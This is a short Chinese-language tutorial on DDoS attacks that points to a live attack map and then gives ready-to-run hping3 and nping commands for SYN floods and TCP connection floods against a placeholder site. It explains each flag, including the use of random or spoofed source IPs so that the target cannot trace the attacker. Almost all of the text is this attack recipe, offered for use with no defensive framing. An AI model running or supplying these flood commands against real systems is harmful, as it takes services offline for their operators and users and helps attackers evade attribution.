DDoS攻击是常见的攻击方式,每小时大约发生28次。http://www.digitalattackmap.com提供在世界范围内的DDoS实时攻击分布图:

从DDoS攻击的地图上就可以看出国际形势;例如,到9月18号可以看到日本-中国的攻击;川普宣布建墙之后,可以看到墨西哥-美国的攻击。

使用hping3进行DoS攻击:

# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com
  • -c:发送数据包的个数
  • -d:每个数据包的大小
  • -S:发送SYN数据包
  • -w:TCP window大小
  • -p:目标端口,你可以指定任意端口
  • –flood:尽可能快的发送数据包
  • –rand-source:使用随机的IP地址,目标机器看到一堆ip,不能定位你的实际IP;也可以使用-a或–spoof隐藏主机名

简单的SYN洪水攻击:

# hping3 -S --flood -V testsite.com

TCP连接攻击:

# nping --tcp-connect -rate=90000 -c 900000 -q testsite.com

关于这两个工具的更多信息:

# man hping3
# man nping